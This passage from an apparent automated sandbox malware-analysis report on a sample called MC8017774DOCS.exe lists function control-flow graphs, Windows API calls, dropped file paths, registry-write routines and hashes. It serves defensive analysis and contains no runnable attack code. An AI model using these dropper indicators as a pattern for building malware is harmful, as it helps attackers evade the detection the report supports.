                                                                                                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Temp\nse865B.tmp$C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dll$Call
                                                                                                                                                    • API String ID: 1941528284-656889067
                                                                                                                                                    • Opcode ID: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                                                                                                                                    • Instruction ID: 2a95d3c8b727dc51f4ea131d05094547f585338353aa12d45a2270be549af1c7
                                                                                                                                                    • Opcode Fuzzy Hash: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                                                                                                                                    • Instruction Fuzzy Hash: C141B471910514BACF107BA5DD45DAF3A79EF45328B20823FF512B10E1DB3C4A519B6E
                                                                                                                                                    Function 00406601 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 912 406601-406621 GetSystemDirectoryW 913 406623 912->913 914 406625-406627 912->914 913->914 915 406638-40663a 914->915 916 406629-406632 914->916 918 40663b-40666e wsprintfW LoadLibraryExW 915->918 916->915 917 406634-406636 916->917 917->918
                                                                                                                                                    APIs
                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                                                                                                    • wsprintfW.USER32 ref: 00406653
                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                    • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                    • API String ID: 2200240437-1946221925
                                                                                                                                                    • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                    • Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
                                                                                                                                                    • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                    • Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98
                                                                                                                                                    Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 919 403116-40312d 920 403136-40313f 919->920 921 40312f 919->921 922 403141 920->922 923 403148-40314d 920->923 921->920 922->923 924 40315d-40316a call 40330e 923->924 925 40314f-403158 call 403324 923->925 929 403170-403174 924->929 930 4032fc 924->930 925->924 931 4032a7-4032a9 929->931 932 40317a-4031a0 GetTickCount 929->932 933 4032fe-4032ff 930->933 934 4032e9-4032ec 931->934 935 4032ab-4032ae 931->935 936 403304 932->936 937 4031a6-4031ae 932->937 938 403307-40330b 933->938 939 4032f1-4032fa call 40330e 934->939 940 4032ee 934->940 935->936 941 4032b0 935->941 936->938 942 4031b0 937->942 943 4031b3-4031c1 call 40330e 937->943 939->930 953 403301 939->953 940->939 946 4032b3-4032b9 941->946 942->943 943->930 952 4031c7-4031d0 943->952 949 4032bb 946->949 950 4032bd-4032cb call 40330e 946->950 949->950 950->930 956 4032cd-4032d9 call 405e3f 950->956 955 4031d6-4031f6 call 4067d2 952->955 953->936 961 4031fc-40320f GetTickCount 955->961 962 40329f-4032a1 955->962 963 4032a3-4032a5 956->963 964 4032db-4032e5 956->964 965 403211-403219 961->965 966 40325a-40325c 961->966 962->933 963->933 964->946 967 4032e7 964->967 968 403221-403257 MulDiv wsprintfW call 4052ff 965->968 969 40321b-40321f 965->969 970 403293-403297 966->970 971 40325e-403262 966->971 967->936 968->966 969->966 969->968 970->937 972 40329d 970->972 974 403264-40326b call 405e3f 971->974 975 403279-403284 971->975 972->936 979 403270-403272 974->979 977 403287-40328b 975->977 977->955 980 403291 977->980 979->963 981 403274-403277 979->981 980->936 981->977
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountTick$wsprintf
                                                                                                                                                    • String ID: ... %d%%
                                                                                                                                                    • API String ID: 551687249-2449383134
                                                                                                                                                    • Opcode ID: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                                                                                                                                    • Instruction ID: 204c6f4639eb8c290f7f343d6ac391169eef919077521cdf394e4ce58078bb87
                                                                                                                                                    • Opcode Fuzzy Hash: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                                                                                                                                    • Instruction Fuzzy Hash: 7A518931900219EBCB10DF65DA84A9F7FA8AB44366F1441BBED14B62C0D7789F50CBA9
                                                                                                                                                    Function 004057CE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 982 4057ce-405819 CreateDirectoryW 983 40581b-40581d 982->983 984 40581f-40582c GetLastError 982->984 985 405846-405848 983->985 984->985 986 40582e-405842 SetFileSecurityW 984->986 986->983 987 405844 GetLastError 986->987 987->985
                                                                                                                                                    APIs
                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00405825
                                                                                                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00405844
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                                                    • API String ID: 3449924974-3125694417
                                                                                                                                                    • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                                    • Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
                                                                                                                                                    • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                                    • Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9
                                                                                                                                                    Function 00405DBC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 988 405dbc-405dc8 989 405dc9-405dfd GetTickCount GetTempFileNameW 988->989 990 405e0c-405e0e 989->990 991 405dff-405e01 989->991 993 405e06-405e09 990->993 991->989 992 405e03 991->992 992->993
                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405DDA
                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\MC8017774DOCS.exe",0040336A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004035B6), ref: 00405DF5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                    • String ID: "C:\Users\user\Desktop\MC8017774DOCS.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                    • API String ID: 1716503409-1820667212
                                                                                                                                                    • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                    • Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
                                                                                                                                                    • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                    • Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4
                                                                                                                                                    Function 6E9B177B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 994 6e9b177b-6e9b17ba call 6e9b1b63 998 6e9b18da-6e9b18dc 994->998 999 6e9b17c0-6e9b17c4 994->999 1000 6e9b17cd-6e9b17da call 6e9b2398 999->1000 1001 6e9b17c6-6e9b17cc call 6e9b2356 999->1001 1006 6e9b180a-6e9b1811 1000->1006 1007 6e9b17dc-6e9b17e1 1000->1007 1001->1000 1008 6e9b1813-6e9b182f call 6e9b256d call 6e9b15b4 call 6e9b1272 GlobalFree 1006->1008 1009 6e9b1831-6e9b1835 1006->1009 1010 6e9b17fc-6e9b17ff 1007->1010 1011 6e9b17e3-6e9b17e4 1007->1011 1033 6e9b1889-6e9b188d 1008->1033 1016 6e9b1882-6e9b1888 call 6e9b256d 1009->1016 1017 6e9b1837-6e9b1880 call 6e9b15c6 call 6e9b256d 1009->1017 1010->1006 1012 6e9b1801-6e9b1802 call 6e9b2d2f 1010->1012 1014 6e9b17ec-6e9b17ed call 6e9b2a74 1011->1014 1015 6e9b17e6-6e9b17e7 1011->1015 1025 6e9b1807 1012->1025 1028 6e9b17f2 1014->1028 1021 6e9b17e9-6e9b17ea 1015->1021 1022 6e9b17f4-6e9b17fa call 6e9b2728 1015->1022 1016->1033 1017->1033 1021->1006 1021->1014 1032 6e9b1809 1022->1032 1025->1032 1028->1025 1032->1006 1037 6e9b18ca-6e9b18d1 1033->1037 1038 6e9b188f-6e9b189d call 6e9b2530 1033->1038 1037->998 1040 6e9b18d3-6e9b18d4 GlobalFree 1037->1040 1044 6e9b189f-6e9b18a2 1038->1044 1045 6e9b18b5-6e9b18bc 1038->1045 1040->998 1044->1045 1046 6e9b18a4-6e9b18ac 1044->1046 1045->1037 1047 6e9b18be-6e9b18c9 call 6e9b153d 1045->1047 1046->1045 1048 6e9b18ae-6e9b18af FreeLibrary 1046->1048 1047->1037 1048->1045
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E9B1B63: GlobalFree.KERNEL32(?), ref: 6E9B1DB6
                                                                                                                                                      • Part of subcall function 6E9B1B63: GlobalFree.KERNEL32(?), ref: 6E9B1DBB
                                                                                                                                                      • Part of subcall function 6E9B1B63: GlobalFree.KERNEL32(?), ref: 6E9B1DC0
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6E9B1829
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 6E9B18AF
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6E9B18D4
                                                                                                                                                      • Part of subcall function 6E9B2356: GlobalAlloc.KERNEL32(00000040,?), ref: 6E9B2387
                                                                                                                                                      • Part of subcall function 6E9B2728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6E9B17FA,00000000), ref: 6E9B27F8
                                                                                                                                                      • Part of subcall function 6E9B15C6: lstrcpyW.KERNEL32(?,6E9B4020,00000000,6E9B15C3,?,00000000,6E9B1753,00000000), ref: 6E9B15DC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2560404950.000000006E9B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560576199.000000006E9B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560603132.000000006E9B5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e9b0000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1791698881-3916222277
                                                                                                                                                    • Opcode ID: c57e560a4f7fecf10f060fd0130746fce5ab0d1756ae2ceadb644f05e30cc407
                                                                                                                                                    • Instruction ID: a98fe10586dbc9befab344134bcf0e372016a8706fab3f72823e9269adaa4bd7
                                                                                                                                                    • Opcode Fuzzy Hash: c57e560a4f7fecf10f060fd0130746fce5ab0d1756ae2ceadb644f05e30cc407
                                                                                                                                                    • Instruction Fuzzy Hash: C141B1B18042459ADF009FF698D8BDB37ACBF57314F0449A5E9169B186EBB8C588CF60
                                                                                                                                                    Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1051 4023e4-402415 call 402c41 * 2 call 402cd1 1058 402ac5-402ad4 1051->1058 1059 40241b-402425 1051->1059 1061 402427-402434 call 402c41 lstrlenW 1059->1061 1062 402438-40243b 1059->1062 1061->1062 1064 40243d-40244e call 402c1f 1062->1064 1065 40244f-402452 1062->1065 1064->1065 1069 402463-402477 RegSetValueExW 1065->1069 1070 402454-40245e call 403116 1065->1070 1073 402479 1069->1073 1074 40247c-40255d RegCloseKey 1069->1074 1070->1069 1073->1074 1074->1058 1076 40288b-402892 1074->1076 1076->1058
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse865B.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 0040242F
                                                                                                                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nse865B.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040246F
                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse865B.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseValuelstrlen
                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nse865B.tmp
                                                                                                                                                    • API String ID: 2655323295-2695492296
                                                                                                                                                    • Opcode ID: e4c63a464812e31c68653a2d561002cfdcec3cddba2e48d4c9e2fa9e1af61684
                                                                                                                                                    • Instruction ID: 82080937d165882f0efaaa77ae0bb3c7350c3cd8b3028382441b60bd8f3f090b
                                                                                                                                                    • Opcode Fuzzy Hash: e4c63a464812e31c68653a2d561002cfdcec3cddba2e48d4c9e2fa9e1af61684
                                                                                                                                                    • Instruction Fuzzy Hash: 60118171D00104BEEF10AFA5DE89EAEBAB4EB44754F11803BF504B71D1DBB88D419B28
                                                                                                                                                    Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405C25
                                                                                                                                                      • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                                                                                                                                      • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                      • Part of subcall function 004057CE: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne, xrefs: 00401640
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
